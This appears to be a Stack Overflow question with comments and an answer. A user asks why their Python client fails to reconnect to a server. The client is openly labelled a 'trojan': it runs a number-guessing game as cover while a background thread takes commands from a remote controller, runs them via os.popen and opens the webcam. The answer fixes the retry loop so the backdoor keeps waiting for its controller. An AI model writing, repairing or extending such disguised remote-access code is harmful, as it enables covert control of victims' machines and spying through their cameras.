# Python sockets can't make a connection

Tags: python, python-3.x, sockets, server, client

In order to run my code I need to have server.py running before client.py in order for it to connect. I want to have it work in both directions so that it doesn't matter what goes first. I set up a `try` and `except` block but I still get a `ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively refused it` error.

This is my client.py:

```
import random
import socket
import threading
import sys
import os
from os import system, name
from time import sleep
import cv2


def commands():
    cmd_mode = False
    # Commands for the trojan
    if command == 'cmdon':
        cmd_mode = True
        client.send(
            'You now have terminal access!'.encode('utf-8'))
    if command == 'cmdoff':
        cmd_mode = False
    if cmd_mode:
        os.popen(command)
    else:
        if command == 'webcam':
            cap = cv2.VideoCapture(0)
            while True:
                ret, frame = cap.read()
                cv2.imshow('WebCam (Press enter to exit)', frame)
                if cv2.waitKey(1) & 0xFF == ord(' '):
                    break
            cap.release()
            cv2.destroyAllWindows()
    client.send(
        f'{command} was exectued successfully!'.encode('utf-8'))


def access():
    HOST = '127.0.0.1'
    PORT = 22262

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            client.connect((HOST, PORT))
            commands()
        except Exception:
            client.connect((HOST, PORT))
            commands()


def game():
    number = random.randint(0, 1000)
    tries = 1
    done = False

    while not done:
        guess = int(input('Enter a guess: '))

        if guess == number:
            done = True
            print('You won!')
        else:
            tries += 1
            if guess > number:
                print('The actual number is smaller.')
            else:
                print('The actual number is larger.')
        print(f'You need {tries} tries!')


t1 = threading.Thread(target=game)
t2 = threading.Thread(target=access)

t1.start()
t2.start()
```

This is my server.py

```
import socket
from os import system, name


def clear():
    if name == 'nt':
        _ = system('cls')


HOST = ''
PORT = 22262

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))

server.listen()
client, address = server.accept()
server.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 10000, 3000))


while True:
    print(f'Connected to {address}')
    cmd_input = input('Enter a command: ')
    client.send(cmd_input.encode('utf-8'))
    print(client.recv(1024).decode('utf-8'))
```

What's wrong with my code? Why isn't the `except` block handling the error and attempting to reconnect?

Comment: commands function is not called properly in the except block

Comment: How is it wrong? Can you please explain?

Comment: Inside access() function, inside the except block you have called it as commands and not as commands().

Comment: fixed that but i still get the same error

Comment: The thing is when you call the commands() function, it switches control to commands function. Is there any error occurring in the commands function ? Could you please share the error that you are receiving exactly ?

Comment: Also are you running server.py before or after running the client.py ?

Comment: You don't need another connect on Exception `except Exception: client.connect((HOST, PORT))`, it will fail and fail the whole thread.

Comment: It works if I run server.py before it. But I need client.py to continuously wait for connections so that if I run server.py after it would still work

Comment: I get this error when I run it





```File "C:\Users\vipku\AppData\Local\Programs\Python\Python37\lib\threading.py", line 926, in _bootstrap_inner
    self.run()
  File "C:\Users\vipku\AppData\Local\Programs\Python\Python37\lib\threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "client.py", line 47, in access
    client.connect((HOST, PORT))
ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively refused it
```

Answer (score 0):

Found what's wrong I just had to change

```
 except Exception:
            client.connect((HOST, PORT))
            commands()
```

to

```
 except Exception:
            pass
```